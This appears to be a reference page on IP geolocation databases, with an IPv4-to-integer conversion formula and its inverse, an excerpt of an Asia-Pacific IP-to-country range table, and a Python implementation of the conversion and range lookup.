For example, IP address "" is equivalent to IP number "3401190660". It falls in the following range of IP numbers in the table because it is between the "From IP number" and the "To IP number":

3401056256 3401400319 MY MALAYSIA

From the IP range, the Country Name is Malaysia and the Country Code is MY.


From IP Number To IP Number Country Code Country Name
3400892416 3400925183 HK HONG KONG
3400925184 3400933375 TH THAILAND
3400941568 3400949759 AU AUSTRALIA
3400957952 3400966143 AU AUSTRALIA
3400982528 3400990719 HK HONG KONG
3400990720 3400998911 ID INDONESIA
3400998912 3401003007 PH PHILIPPINES
3401007104 3401011199 IN INDIA
3401023488 3401056255 TH THAILAND
3401056256 3401400319 MY MALAYSIA
3401408512 3401416703 HK HONG KONG
3401416704 3401420799 KR KOREA, REPU
3401441280 3401449471 PH PHILIPPINES
3401449472 3401515263 MY MALAYSIA
3401531392 3401539583 IN INDIA
3401547776 3401580543 MY MALAYSIA
3401580544 3402629119 CN CHINA
3402629120 3404464127 JP JAPAN
3405774848 3406434303 AU AUSTRALIA
3406436352 3409969151 AU AUSTRALIA
3409969152 3410755583 TW TAIWAN
3410755584 3410780159 AU AUSTRALIA
3410788352 3410796543 HK HONG KONG
3410796544 3410800639 LK SRI LANKA
3410812928 3410821119 AU AUSTRALIA
3410821120 3410853887 TW TAIWAN
3410853888 3410862079 HK HONG KONG
3410870272 3410874367 IN INDIA
3410878464 3410886655 ID INDONESIA
3410886656 3410887679 TW TAIWAN
3410894848 3410898943 HK HONG KONG
3410903040 3410911231 HK HONG KONG
3410919424 3410927615 IN INDIA
3410944000 3410952191 PH PHILIPPINES
3410952192 3410960383 TW TAIWAN
3410968576 3410984959 NZ NEW ZEALAND
3410984960 3411017727 TW TAIWAN
3411017728 3411018751 HK HONG KONG
3411034112 3411051519 HK HONG KONG
3411058688 3411062783 AU AUSTRALIA
3411066880 3411083775 HK HONG KONG
3411087360 3411091455 CN CHINA
3411091456 3411095551 SG SINGAPORE
3411099648 3411107839 MM MYANMAR
3411116032 3411124223 IN INDIA
3411132416 3411136511 PK PAKISTAN
3411147776 3411149311 HK HONG KONG
3411156992 3411161087 PH PHILIPPINES
3411165184 3411173375 MY MALAYSIA
3411181568 3411189759 JP JAPAN
3411197952 3411202047 BD BANGLADESH
3411213312 3411215359 HK HONG KONG
3411230720 3411247103 HK HONG KONG
3411247104 3411255295 AU AUSTRALIA
3411278848 3411296255 HK HONG KONG
3411312640 3411313151 HK HONG KONG
3411329024 3411337215 PH PHILIPPINES
3411337216 3411341311 AU AUSTRALIA
3411345408 3411411967 HK HONG KONG
3411435520 3411443711 IN INDIA
3411443712 3411460095 HK HONG KONG
3411475456 3411476479 HK HONG KONG
3411476480 3411509247 AU AUSTRALIA
3411509248 3411517439 PH PHILIPPINES
3411525632 3411529727 SG SINGAPORE
3411533824 3411543039 CN CHINA
3411558400 3411566591 AU AUSTRALIA
3411574784 3411582975 IN INDIA
3411591168 3411595263 HK HONG KONG
3411599360 3411607551 AU AUSTRALIA
3411607552 3411608575 CN CHINA
3411623936 3411632127 AU AUSTRALIA
3411640320 3411648511 PK PAKISTAN
3411656704 3411673087 AU AUSTRALIA
3411673088 3411674111 CN CHINA
3411689472 3411701759 IN INDIA
3411722240 3411726335 PH PHILIPPINES
3411730432 3411738623 HK HONG KONG
3411738624 3411739647 CN CHINA
3411755008 3411763199 AU AUSTRALIA
3411771392 3411779583 HK HONG KONG
3411795968 3411804159 AU AUSTRALIA
3411804160 3411805183 CN CHINA
3411820544 3411832831 SG SINGAPORE
3411836928 3411845119 MY MALAYSIA
3411853312 3411857407 IN INDIA
3411861504 3411869695 AU AUSTRALIA
3411869696 3411943423 CN CHINA
3411951616 3411967999 LK SRI LANKA
3411968000 3411984383 AU AUSTRALIA
3411984384 3412000767 IN INDIA
3412000768 3412002815 CN CHINA
3412017152 3412025343 SG SINGAPORE
3412033536 3412066303 TW TAIWAN
3412066304 3412213759 NZ NEW ZEALAND
3412213760 3412221951 AU AUSTRALIA
3412230144 3412246527 HK HONG KONG
3412254720 3412262911 NR NAURU
3412262912 3412273151 NZ NEW ZEALAND
3412279296 3412281343 NZ NEW ZEALAND


An IPv4 address is divided into 4 sub-blocks (octets), each weighted by a power of 256. The IP number is stored in the database because a range search over a single integer column (for example WHERE ip_number BETWEEN from_ip AND to_ip) is efficient, whereas comparing dotted-quad strings is not. The formula below is for IPv4 only; an IPv6 address is 128 bits and needs a different representation.

Beginning IP number and Ending IP Number are calculated based on following formula:

IP Number = 16777216*w + 65536*x + 256*y + z (Formula 1)

IP Address = w.x.y.z

For example, if the IP address is 202.186.13.4, its IP Number 3401190660 follows from Formula 1.

IP Address = 202.186.13.4

So, w = 202, x = 186, y = 13 and z = 4

IP Number = 16777216*202 + 65536*186 + 256*13 + 4
= 3388997632 + 12189696 + 3328 + 4
= 3401190660

To reverse IP number to IP address,

w = int ( IP Number / 16777216 ) % 256
x = int ( IP Number / 65536 ) % 256
y = int ( IP Number / 256 ) % 256
z = int ( IP Number ) % 256

where % is the mod operator and int() returns the integer part of the division.
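A worked implementation of both Formula 1 (and its inverse) and the range lookup against the IP-COUNTRY table, added here and not part of the original page; it serves the table-lookup example earlier on the page as well. The table rows are an excerpt of the page's own table, the function names are mine, and the result is cross-checked against the standard library's ipaddress module. The lookup is a binary search over the From IP Number column (the same work a database index does for a BETWEEN query) and returns None for numbers that fall into a gap between rows, which a naive "last row whose From is below the number" lookup would silently misattribute to the preceding country.

```python
import bisect
import ipaddress

# Excerpt of the page's IP-COUNTRY table: (From IP Number, To IP Number, code, name).
# Rows must be sorted by From IP Number and must not overlap.
IP_COUNTRY_TABLE = [
    (3400892416, 3400925183, "HK", "HONG KONG"),
    (3400925184, 3400933375, "TH", "THAILAND"),
    (3400941568, 3400949759, "AU", "AUSTRALIA"),
    (3401023488, 3401056255, "TH", "THAILAND"),
    (3401056256, 3401400319, "MY", "MALAYSIA"),
    (3401408512, 3401416703, "HK", "HONG KONG"),
    (3401580544, 3402629119, "CN", "CHINA"),
]


def ip_to_number(ip_address):
    """Formula 1: IP Number = 16777216*w + 65536*x + 256*y + z for w.x.y.z."""
    parts = ip_address.split(".")
    if len(parts) != 4:
        raise ValueError("not a dotted-quad IPv4 address: %r" % ip_address)
    octets = [int(p) for p in parts]
    if any(o < 0 or o > 255 for o in octets):
        raise ValueError("octet out of range: %r" % ip_address)
    w, x, y, z = octets
    return 16777216 * w + 65536 * x + 256 * y + z


def number_to_ip(ip_number):
    """Inverse of Formula 1, using the page's int(n / weight) % 256 steps."""
    if not 0 <= ip_number <= 0xFFFFFFFF:
        raise ValueError("IP number outside the 32-bit range: %r" % ip_number)
    w = ip_number // 16777216 % 256
    x = ip_number // 65536 % 256
    y = ip_number // 256 % 256
    z = ip_number % 256
    return "%d.%d.%d.%d" % (w, x, y, z)


def matches_stdlib(ip_address):
    """Cross-check Formula 1 against the standard library's conversion."""
    return ip_to_number(ip_address) == int(ipaddress.IPv4Address(ip_address))


def lookup_country(ip_address, table=IP_COUNTRY_TABLE):
    """Return (code, name) for the row whose range contains the address, else None."""
    n = ip_to_number(ip_address)
    from_column = [row[0] for row in table]
    # Index of the last row whose From IP Number is <= n.
    i = bisect.bisect_right(from_column, n) - 1
    if i < 0:
        return None  # below the first row
    _start, end, code, name = table[i]
    if n > end:
        return None  # n lies in a gap between two rows: not in the table
    return code, name


if __name__ == "__main__":
    for ip in ("202.186.13.4", "202.182.32.0", "255.255.255.255"):
        print(ip, ip_to_number(ip), number_to_ip(ip_to_number(ip)),
              lookup_country(ip))
```

202.186.13.4 resolves to MY/MALAYSIA as on the page, while 202.182.32.0 (IP Number 3400933376, one past the end of the THAILAND row) returns None rather than being attributed to the preceding row.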